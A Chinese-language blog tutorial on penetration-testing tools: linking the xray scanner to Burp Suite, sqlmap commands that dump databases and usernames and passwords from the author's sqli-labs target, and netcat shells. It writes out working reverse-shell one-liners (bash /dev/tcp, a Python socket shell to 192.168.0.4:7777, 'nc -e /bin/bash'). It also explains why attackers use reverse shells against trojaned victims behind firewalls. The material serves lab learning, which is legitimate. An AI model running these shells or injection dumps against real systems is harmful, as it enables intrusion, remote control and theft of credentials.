sqlmap,burp+xray,nc工具使用


Burp+xray

xray是一种功能强大的安全评估工具,主要特性有:

  • 检测速度快。发包速度快; 突破性检测算法高效。
  • 支持范围广。大至OWASP十大通用突破检测,小至各种CMS框架POC,均可以支持。
  • 代码质量高。编写代码的人员素质高,通过代码审查,单元测试,集成测试等多层验证来提高代码可靠性。
  • 高级可定制。通过配置文件暴露了引擎的各种参数,通过修改配置文件可以极大的客制化功能。
  • 安全无威胁。xray定位为一种安全辅助评估工具,而不是攻击工具,内置的所有有效载荷和poc进行无害化检查。

xray最主要的就是和Burpsuit联动

首先生成证书

xray所在目录下,打开cmd,输入

.\xray_windows_amd64.exe genca

在当前目录下会生成有一个证书,然后导入到Firefox浏览器中

打开设置,搜索证书

直接导入

开启xray监听

cmd下输入

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output proxy.html

这个表示监听127.0.0.1的7777端口并将扫描结果生成proxy.html文件在当前目录下

xray定义了如下几种输出方式:

  • 屏幕输出,默认开启
  • JSON文件输出
  • HTML报告输出
  • Webhook输出

Burp设置

打开Burpsuit,点击User options

添加上流代理服务,按照一下配置

Destination host处可以使用*匹配多个任意字符串,?匹配单一任意字符串,而上游代理的地址则填写 xray 的监听地址。

查看xray的cmd,就可以开到扫描结果。

还可以查看proxy.html获取结果

sqlmap的使用

sqlmap 运行在python2.7环境下

测试我自己搭的sqli-lab靶场

  • sqlmap -u 网址 –dbs:爆所有数据库信息
sqlmap -u http://82.157.179.125:8032/Less-1/?id=1 --dbs
  • sqlmap -u 网址 -D security –tables :查看security里有多少张表
sqlmap -u http://82.157.179.125:8032/Less-1/?id=1 -D security --tables
  • sqlmap -u 网址 -D security -T users –columns:查看security中users这张表有多少列
sqlmap -u http://82.157.179.125:8032/Less-1/?id=1 -D security -T users --columns

  • sqlmap -u 网址 -D security -T users -C username,password –dump :取出security里的用户名和密码,dump取的意思
sqlmap -u http://82.157.179.125:8032/Less-1/?id=1 -D security -T users -C username,password --dump
  • 报错注入:sqlmap -u 网址 –current-db –batch(忽略一些错误) –threads 10 –technique E

命令输入:

sqlmap -u http://82.157.179.125:8032/Less-5/?id=123 --current-db --batch --threads 10 --technique E

成功查到

image-20220404231723263
  • post注入——指定表单:*标识在哪里,哪里进行打击 sqlmap - u 网址(不需要目标注入点) –data “uname = admin*&passwd = admin” –dbs

  • post注入——与Burpsuite联动(比较常用):用burp抓包,copy to file,导出为txt文件。打开文件,在注入点打*,copy到kali上。

    sqlmap -r “文件路径” –dbs

    image-20220404231049389

    命令输入:

    sqlmap -r "/root/test.txt" --dbs
  • cookie 注入 sqlmap -u 网址(不要注入点) –cookie=” 抓包的cookie(注入打*)”和post注入一样

  • technique 对应四个参数:BETS

E = error B = bilnd T = time S = standard

nc使用

正向反弹

ubuntu或者CentOS上面输入

nc -lvp 7777 -e /bin/bash

kali上输入

nc ip 7777

正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。

需要目标机安装nc。

反向反弹shell

反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。

为什么要反弹shell?

1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。

2.目标机器的ip动态改变,你不能持续控制。

3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。

4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。

那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

方法1:bash反弹

bash -i >& /dev/tcp/ip/port 0>&1

但首先需要在kali上使用nc监听端口:

nc -lvp 7777

此方法在ubuntu下不会反弹成功,CentOS可以反弹成功。

如果我们处于内网,我们可以借助frp进行端口代理,但是目标主机处于内网你就没法正向代理了。

方法2:python反弹

首先,使用nc在kali上监听端口:

nc -lvp 7777

在CentOS或者ubuntu下使用python去反向连接,输入:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

方法3

首先在kali上输入nc监听:

nc -lvp 7777

在CentOS或者ubuntu 上使用nc去反向连接,命令如下:

nc -e /bin/bash 192.168.0.4 7777

文章作者: 小小星仔
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 小小星仔 !
评论
  目录